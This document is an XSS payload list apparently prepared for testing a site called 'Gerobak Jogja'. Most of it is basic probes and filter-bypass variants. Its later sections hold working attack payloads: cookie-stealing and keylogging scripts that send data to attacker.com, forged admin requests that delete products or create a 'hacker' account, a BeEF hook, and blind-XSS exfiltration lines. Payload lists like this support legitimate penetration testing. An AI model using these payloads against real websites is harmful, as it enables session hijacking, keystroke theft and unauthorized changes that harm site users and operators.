# XSS Payloads for Gerobak Jogja Testing
# Basic XSS Payloads
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>confirm('XSS')</script>
<script>prompt('XSS')</script>

# Image-based XSS
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert(1)>
<img src="x" onerror="alert('XSS')">
<img/src=x onerror=alert('XSS')>

# SVG XSS
<svg onload=alert('XSS')>
<svg/onload=alert('XSS')>
<svg onload=alert(1)>
<svg><script>alert('XSS')</script></svg>

# Event Handler XSS
"><script>alert('XSS')</script>
'><script>alert('XSS')</script>
</script><script>alert('XSS')</script>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>

# JavaScript Protocol
javascript:alert('XSS')
javascript:alert(1)
javascript:confirm('XSS')

# Encoded XSS
%3Cscript%3Ealert('XSS')%3C/script%3E
&lt;script&gt;alert('XSS')&lt;/script&gt;
&#60;script&#62;alert('XSS')&#60;/script&#62;

# Filter Bypass
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/)</script>

# DOM-based XSS
<img src=x onerror=eval(atob('YWxlcnQoJ1hTUycpOw=='))>
<script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))</script>

# Advanced XSS
<iframe src=javascript:alert('XSS')>
<object data=javascript:alert('XSS')>
<embed src=javascript:alert('XSS')>
<form><button formaction=javascript:alert('XSS')>Click

# Polyglot XSS
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>

# Context-specific XSS
# For input fields
"><script>alert('XSS')</script><"
'><script>alert('XSS')</script><'

# For URL parameters
?search=<script>alert('XSS')</script>
?name="><script>alert('XSS')</script>

# For JSON contexts
{"name":"<script>alert('XSS')</script>"}
{"search":"</script><script>alert('XSS')</script>"}

# Cookie stealing payloads
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie</script>
<script>new Image().src='http://attacker.com/steal.php?cookie='+document.cookie</script>
<script>fetch('http://attacker.com/steal.php?cookie='+document.cookie)</script>

# Keylogger payloads
<script>document.onkeypress=function(e){fetch('http://attacker.com/log.php?key='+e.key)}</script>
<script>document.addEventListener('keypress',function(e){new Image().src='http://attacker.com/log.php?key='+e.key})</script>

# Admin action execution
<script>fetch('/admin/delete-product/123', {method: 'POST'})</script>
<script>fetch('/admin/create-user', {method: 'POST', body: JSON.stringify({username:'hacker',password:'password'})})</script>

# BeEF hook (if using BeEF framework)
<script src="http://attacker.com:3000/hook.js"></script>

# Blind XSS payloads (for stored XSS)
<script src="http://attacker.com/blind.js"></script>
<img src="http://attacker.com/blind.gif">
<script>setTimeout(function(){var img=new Image();img.src='http://attacker.com/blind.php?data='+document.domain},1000)</script>